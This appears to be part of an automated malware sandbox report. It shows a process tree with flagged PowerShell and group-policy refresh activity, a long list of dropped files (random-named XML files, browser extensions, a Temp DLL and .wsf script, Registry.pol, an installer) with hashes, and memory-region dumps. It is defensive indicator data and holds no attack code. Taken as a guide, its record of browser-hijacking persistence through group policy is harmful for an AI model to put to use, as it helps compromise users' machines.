                                                                                                                                                                                                                    • Command and Scripting Interpreter: PowerShell
                                                                                                                                                                                                                    • Drops file in System32 directory
                                                                                                                                                                                                                    • Suspicious behavior: EnumeratesProcesses
                                                                                                                                                                                                                    • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                                                                                    PID:2620
                                                                                                                                                                                                                    • C:\Windows\system32\gpupdate.exe
                                                                                                                                                                                                                      "C:\Windows\system32\gpupdate.exe" /force
                                                                                                                                                                                                                      3⤵
                                                                                                                                                                                                                        PID:1548
                                                                                                                                                                                                                  • C:\Windows\system32\gpscript.exe
                                                                                                                                                                                                                    gpscript.exe /RefreshSystemParam
                                                                                                                                                                                                                    1⤵
                                                                                                                                                                                                                      PID:1240
                                                                                                                                                                                                                    • C:\Windows\system32\gpscript.exe
                                                                                                                                                                                                                      gpscript.exe /RefreshSystemParam
                                                                                                                                                                                                                      1⤵
                                                                                                                                                                                                                        PID:2832
                                                                                                                                                                                                                      • C:\Windows\system32\gpscript.exe
                                                                                                                                                                                                                        gpscript.exe /RefreshSystemParam
                                                                                                                                                                                                                        1⤵
                                                                                                                                                                                                                          PID:1748

                                                                                                                                                                                                                        Network

                                                                                                                                                                                                                              MITRE ATT&CK Enterprise v15

                                                                                                                                                                                                                              Replay Monitor

                                                                                                                                                                                                                              Loading Replay Monitor...

                                                                                                                                                                                                                              Downloads

                                                                                                                                                                                                                              • C:\Program Files (x86)\NuNDxVhSfKiQUmJwJAR\SPSWawX.xml

                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                2KB

                                                                                                                                                                                                                                MD5

                                                                                                                                                                                                                                efb14f916457e778df49e8ebdea4f5fd

                                                                                                                                                                                                                                SHA1

                                                                                                                                                                                                                                b72d070b9adc3b36e5a94d22682ec3a8ba01a070

                                                                                                                                                                                                                                SHA256

                                                                                                                                                                                                                                1736e7bfbb5d3f35b75d393c354b5ca970beca2fd4038c167f54c176d98e3c29

                                                                                                                                                                                                                                SHA512

                                                                                                                                                                                                                                21a706fa506ddb7a708b5b900437000e956983715432d63c7a66225d81404d324597348ca1e9d987601b69a18856dff6696535763ab399e1b635bff5301c5b86

                                                                                                                                                                                                                              • C:\Program Files (x86)\QtKEgKYoTGTqC\EkjwwPL.xml

                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                2KB

                                                                                                                                                                                                                                MD5

                                                                                                                                                                                                                                f475c381bad86b049cf40e1666b905ed

                                                                                                                                                                                                                                SHA1

                                                                                                                                                                                                                                be63ef7f361f97e9813aedd60050825e4fc088a9

                                                                                                                                                                                                                                SHA256

                                                                                                                                                                                                                                0763df7a67dbdf5f51fe61ea7afad57e222e3fef750d68759b814ef2f19510b4

                                                                                                                                                                                                                                SHA512

                                                                                                                                                                                                                                efcca3159c01aae063744a577a0420895dee9a5c112d66ce07965b68d07e5b9fa918e2855f09a11d2a006a731966a3bb5cd2e4a532f2530dcf794659114b32ca

                                                                                                                                                                                                                              • C:\Program Files (x86)\dlfHiRefefjU2\dTSOkfv.xml

                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                2KB

                                                                                                                                                                                                                                MD5

                                                                                                                                                                                                                                d5c86a3d573f73de2bf3fe4295486958

                                                                                                                                                                                                                                SHA1

                                                                                                                                                                                                                                12db9f09e53481e505f764c785b9eca4067d620d

                                                                                                                                                                                                                                SHA256

                                                                                                                                                                                                                                7349760409b6045dce45be8f8d950f7c6a7838bf3362cac4b332f5cd7926ff64

                                                                                                                                                                                                                                SHA512

                                                                                                                                                                                                                                e34c9d16961698289055e63f8d58e6045ef1fe974a63da87584e46fa918f47b8dc444b8538576d7488d9f4241ba0c67bac331aef6f346c18ede0467937021d56

                                                                                                                                                                                                                              • C:\Program Files (x86)\hsUwQAlMU\zlkgxAn.xml

                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                2KB

                                                                                                                                                                                                                                MD5

                                                                                                                                                                                                                                75d62ade7846971c4e8734460e26053b

                                                                                                                                                                                                                                SHA1

                                                                                                                                                                                                                                9d2f7f33abf7fbcecbdcff928f5687bfc628a037

                                                                                                                                                                                                                                SHA256

                                                                                                                                                                                                                                c9dd940c656adfc14e5ed3acb1ffbf0eb8af9c39cd59658954e7bd349c0ab37b

                                                                                                                                                                                                                                SHA512

                                                                                                                                                                                                                                0226142fb7cf410cc62f7453800d1c5f86d6c1e126fb58d98fc490b6749096919cb479af5f1be03a9cb8546f1b32918534145defc31b5c2ec2e3f1df18c9313a

                                                                                                                                                                                                                              • C:\Program Files\Mozilla Firefox\browser\features\{85FD6ACE-3736-491B-8514-6C8C9556E131}.xpi

                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                2.0MB

                                                                                                                                                                                                                                MD5

                                                                                                                                                                                                                                6515359eb98d226b713bfb0b5bd48fe2

                                                                                                                                                                                                                                SHA1

                                                                                                                                                                                                                                40de573f12e7eefeac94f111e599a5eb86971c85

                                                                                                                                                                                                                                SHA256

                                                                                                                                                                                                                                1d22420c6c863f090ab35c7e52e08b18166b4e5807c2644e8a4b1cde8621344a

                                                                                                                                                                                                                                SHA512

                                                                                                                                                                                                                                fb3dd54aa65f8bf568f1a902343c905d0361597b3441507890e1eadf994185a19cd9c361d91cb7072a444f38312a9531eb6b4d85b414931d658ca75b27b8af8a

                                                                                                                                                                                                                              • C:\ProgramData\nivjmgppGaMJQQVB\LbTSvbt.xml

                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                2KB

                                                                                                                                                                                                                                MD5

                                                                                                                                                                                                                                da9581deac88ad77fcee1cc45b157623

                                                                                                                                                                                                                                SHA1

                                                                                                                                                                                                                                4c89442eafd20d19a07cc598da6433b89801927a

                                                                                                                                                                                                                                SHA256

                                                                                                                                                                                                                                c086d77b6bfa0583e0cb716c91cd09c3e5d067a00e62eec14514b23c93ac712f

                                                                                                                                                                                                                                SHA512

                                                                                                                                                                                                                                18375666234b6ce7823cfd557bc8672347bd529479599ec810d6451159c3a7984363ecd6620b6a079056e08a03608f6d5ea3bbe7babd80c828f4f6cc5a700702

                                                                                                                                                                                                                              • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\agcghmjnenlfcjmnldooeaadankclolo\1.4_0\_locales\en_GB\messages.json

                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                187B

                                                                                                                                                                                                                                MD5

                                                                                                                                                                                                                                2a1e12a4811892d95962998e184399d8

                                                                                                                                                                                                                                SHA1

                                                                                                                                                                                                                                55b0ae8a7b5a5d6094827ede8e6a1d26d4b4a720

                                                                                                                                                                                                                                SHA256

                                                                                                                                                                                                                                32b4406692c26b540fea815a9bb56df1f164140cd849e8025930b7425036cceb

                                                                                                                                                                                                                                SHA512

                                                                                                                                                                                                                                bb54d5e8684a6bfeac559b7c7a7551eed6a8a43a4c6464218cb0adb1c89fea124b69760690c3124af86fa68ac3fdbe903eaa098f0af2b6a58f4702c803abc089

                                                                                                                                                                                                                              • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\agcghmjnenlfcjmnldooeaadankclolo\1.4_0\_locales\fa\messages.json

                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                136B

                                                                                                                                                                                                                                MD5

                                                                                                                                                                                                                                238d2612f510ea51d0d3eaa09e7136b1

                                                                                                                                                                                                                                SHA1

                                                                                                                                                                                                                                0953540c6c2fd928dd03b38c43f6e8541e1a0328

                                                                                                                                                                                                                                SHA256

                                                                                                                                                                                                                                801162df89a8ad2b1a51de75e86eba3958b12960660960a5ffafe9bc55bc293e

                                                                                                                                                                                                                                SHA512

                                                                                                                                                                                                                                2630dd7a3c17dc963b1a71d81295cf22f8b3838748b55c433318e1e22f5b143a6d374ca2e5a8420659fa130200fbaa4814d0f093b1eca244b5635a3b99878e1c

                                                                                                                                                                                                                              • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\agcghmjnenlfcjmnldooeaadankclolo\1.4_0\_locales\pt_BR\messages.json

                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                150B

                                                                                                                                                                                                                                MD5

                                                                                                                                                                                                                                0b1cf3deab325f8987f2ee31c6afc8ea

                                                                                                                                                                                                                                SHA1

                                                                                                                                                                                                                                6a51537cef82143d3d768759b21598542d683904

                                                                                                                                                                                                                                SHA256

                                                                                                                                                                                                                                0ec437af3f59fef30355cf803966a2b9a0cd9323d390297496f750775995a6bf

                                                                                                                                                                                                                                SHA512

                                                                                                                                                                                                                                5bc1f5a2d38f4a071513e2ac25b241c8e5584bed8d77e7fc4194855898d51a328dd73200f5aae6c9bc1b2a304e40e56bc686192074bd8a1bcc98f4971dee428f

                                                                                                                                                                                                                              • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                10KB

                                                                                                                                                                                                                                MD5

                                                                                                                                                                                                                                855538edea842d8d35d32973901d4465

                                                                                                                                                                                                                                SHA1

                                                                                                                                                                                                                                fe1288f5062bec3ea588a137158852a0bac2d2ba

                                                                                                                                                                                                                                SHA256

                                                                                                                                                                                                                                2c593a9836e515e3a9f8fb5a798604dad5f06833fe6a684b5bb96451df3f7fcf

                                                                                                                                                                                                                                SHA512

                                                                                                                                                                                                                                f3d67d8434118cb26a50b04f8afcc4119ac940233cbe06d3bd8e9cf1e734df804835ff7b27f131e0a5423fa6f90c88f64e33f292c3020c3995946f257d29a419

                                                                                                                                                                                                                              • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms

                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                7KB

                                                                                                                                                                                                                                MD5

                                                                                                                                                                                                                                b92858839141fca8959e7436501d1cbc

                                                                                                                                                                                                                                SHA1

                                                                                                                                                                                                                                530e09923cf528f547dab9701fd58eae860bcf34

                                                                                                                                                                                                                                SHA256

                                                                                                                                                                                                                                ff3d9418a0a96b9c023fb3bdd3c2131aeb534df5263e793af1de3296ce60e615

                                                                                                                                                                                                                                SHA512

                                                                                                                                                                                                                                eaf2eee9d1705517342936d77850c308c99264109576b92d5df231b350aad703e509ed7822199724aeb579b16770e88b9eb51b2b780b6fd0c01bf02c33347e09

                                                                                                                                                                                                                              • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms

                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                7KB

                                                                                                                                                                                                                                MD5

                                                                                                                                                                                                                                dc8a476d7871d994d65ef592d7b61d05

                                                                                                                                                                                                                                SHA1

                                                                                                                                                                                                                                acd8914b36cc513673d3b85d848c592e896bb322

                                                                                                                                                                                                                                SHA256

                                                                                                                                                                                                                                05ee54c848ee404c2cfcde89b976783c22c0753f78654fbd678657d5c3a38bbf

                                                                                                                                                                                                                                SHA512

                                                                                                                                                                                                                                6439af659872a2c7582aa60bd1b18486a9addd3bb3d6d1b2980fc3c4ca706442d78fc17c7bbaab4af40aebf5afcb6997636c49768e9b127ec071cfaa5ac9fed0

                                                                                                                                                                                                                              • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms

                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                7KB

                                                                                                                                                                                                                                MD5

                                                                                                                                                                                                                                f916d7f3f2891f46e7fc7d4565d4911b

                                                                                                                                                                                                                                SHA1

                                                                                                                                                                                                                                a5a37d636e18013bf571482e3d4842fa6fcb59f6

                                                                                                                                                                                                                                SHA256

                                                                                                                                                                                                                                464dd4c583d45661b9dd12d325f0cde80e4e7b8176502a94c71dbc6488fac652

                                                                                                                                                                                                                                SHA512

                                                                                                                                                                                                                                f6af9c5c808026dbf6a055c945bfc4a41d510de4feee376a912b5e43832b88f46954e1409aa4443b9d3fbd8277314bc8b1f04345bb32427b7c73ebc45fa4f739

                                                                                                                                                                                                                              • C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\ifb4waqr.default-release\prefs.js

                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                6KB

                                                                                                                                                                                                                                MD5

                                                                                                                                                                                                                                231a421e6931e0f512b736f163799ee0

                                                                                                                                                                                                                                SHA1

                                                                                                                                                                                                                                705d50767908b2d54406fac2bf88992676234e00

                                                                                                                                                                                                                                SHA256

                                                                                                                                                                                                                                f77f830d856c58daf80d2893c87f259d7f2f28f94455e836fe4c26f6a87a6170

                                                                                                                                                                                                                                SHA512

                                                                                                                                                                                                                                b3f4c77e6db5b25fa62f319e91d52cbb862a6b0cd47f00a71e1c827ba0c9cc33e21d9263382136ac9f888f3cabc0199784463259ba3c4bec2e5b93a69b13351b

                                                                                                                                                                                                                              • C:\Windows\Temp\QqEAMUespgTHJnVz\FtydIvqu\mFxtQQl.dll

                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                6.5MB

                                                                                                                                                                                                                                MD5

                                                                                                                                                                                                                                21e3965bd08eabf0ee24dd9d17dc0d5c

                                                                                                                                                                                                                                SHA1

                                                                                                                                                                                                                                8680d90f50ed3caf0b617a1cf512c664bdbd7be8

                                                                                                                                                                                                                                SHA256

                                                                                                                                                                                                                                570e0b2d996c3151a08c5042555500988b7eca34c2126d335e06da13ce772f4a

                                                                                                                                                                                                                                SHA512

                                                                                                                                                                                                                                9b5662e11db22c04c3f4463e493c28b5ef2a7a997e644a6cad8f38d8df2947f8f14b049d0d2136b4e98a53db9db94c5a2ff613b8cdbaa2c7107a46f855c81a3e

                                                                                                                                                                                                                              • C:\Windows\Temp\QqEAMUespgTHJnVz\QmxEvEcN\LGLnUcdBZixZERLI.wsf

                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                9KB

                                                                                                                                                                                                                                MD5

                                                                                                                                                                                                                                8e8b6d2b33f98202c9c822402d0ce90d

                                                                                                                                                                                                                                SHA1

                                                                                                                                                                                                                                6bb9a0b80a3ec7d48e5f5903c60ea9d1493e21db

                                                                                                                                                                                                                                SHA256

                                                                                                                                                                                                                                15f453600a003328b774fdde11c5ca28d45e38e8626101191d015a39c9b433d3

                                                                                                                                                                                                                                SHA512

                                                                                                                                                                                                                                d763af54d95acef9d442f5a10051d209f00ef75925e7802abf34117593e6b6977436d0f9c9a2c0e0df928f7a678bc1a76fc13534b7c319604dde40d1d39a8b72

                                                                                                                                                                                                                              • C:\Windows\system32\GroupPolicy\Machine\Registry.pol

                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                6KB

                                                                                                                                                                                                                                MD5

                                                                                                                                                                                                                                d97e18f6faed7d70e7513409a124f7a3

                                                                                                                                                                                                                                SHA1

                                                                                                                                                                                                                                5ee122d68844e47bf7bb17920e626a8afbe1b7e2

                                                                                                                                                                                                                                SHA256

                                                                                                                                                                                                                                f42326cf5b194f7811086906f8fb4c5753fd6a6f2be74211629d297caa34d3bd

                                                                                                                                                                                                                                SHA512

                                                                                                                                                                                                                                4a4e692baf2737b7be14d38f24e5faed265f02d35087b0405e70f45e39615ddd17e015ae7bcda434ffe58b880a8edb15a60fee25ad1eb60cd98f85d629bb92a3

                                                                                                                                                                                                                              • \Users\Admin\AppData\Local\Temp\7zS194B.tmp\Install.exe

                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                6.7MB

                                                                                                                                                                                                                                MD5

                                                                                                                                                                                                                                a5dca05edc6eda6e2acfe7ca41641cc5

                                                                                                                                                                                                                                SHA1

                                                                                                                                                                                                                                b772813e63a424ae31a2bd75c0067be03aae0165

                                                                                                                                                                                                                                SHA256

                                                                                                                                                                                                                                986e2f087fe32332daf7215461a103fa25d86209ab704e29a81dc419435367ae

                                                                                                                                                                                                                                SHA512

                                                                                                                                                                                                                                c3d865918176c064e638d2c892cb2ef45bc722fa9f3b4e1fb10ca6886054ff2d37cd9fd97fff08cdd95a017374109495bf48069fdc67355b34729fae654da2ed

                                                                                                                                                                                                                              • memory/944-324-0x0000000001320000-0x00000000018EF000-memory.dmp

                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                5.8MB

                                                                                                                                                                                                                              • memory/1164-43-0x000000001B7E0000-0x000000001BAC2000-memory.dmp

                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                2.9MB

                                                                                                                                                                                                                              • memory/1164-44-0x0000000001D90000-0x0000000001D98000-memory.dmp

                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                32KB

                                                                                                                                                                                                                              • memory/1908-24-0x0000000010000000-0x00000000105CF000-memory.dmp

                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                5.8MB

                                                                                                                                                                                                                              • memory/2004-108-0x0000000002150000-0x00000000021AD000-memory.dmp

                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                372KB

                                                                                                                                                                                                                              • memory/2004-75-0x0000000001E50000-0x0000000001ED5000-memory.dmp

                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                532KB

                                                                                                                                                                                                                              • memory/2004-64-0x0000000010000000-0x00000000105CF000-memory.dmp

                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                5.8MB

                                                                                                                                                                                                                              • memory/2004-291-0x0000000002510000-0x0000000002592000-memory.dmp

                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                520KB

                                                                                                                                                                                                                              • memory/2004-302-0x0000000002D90000-0x0000000002E6A000-memory.dmp

                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                872KB

                                                                                                                                                                                                                              • memory/2092-33-0x000000001B630000-0x000000001B912000-memory.dmp

                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                2.9MB

                                                                                                                                                                                                                              • memory/2092-34-0x0000000002890000-0x0000000002898000-memory.dmp

                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                32KB

                                                                                                                                                                                                                              • memory/2484-12-0x0000000010000000-0x00000000105CF000-memory.dmp

                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                5.8MB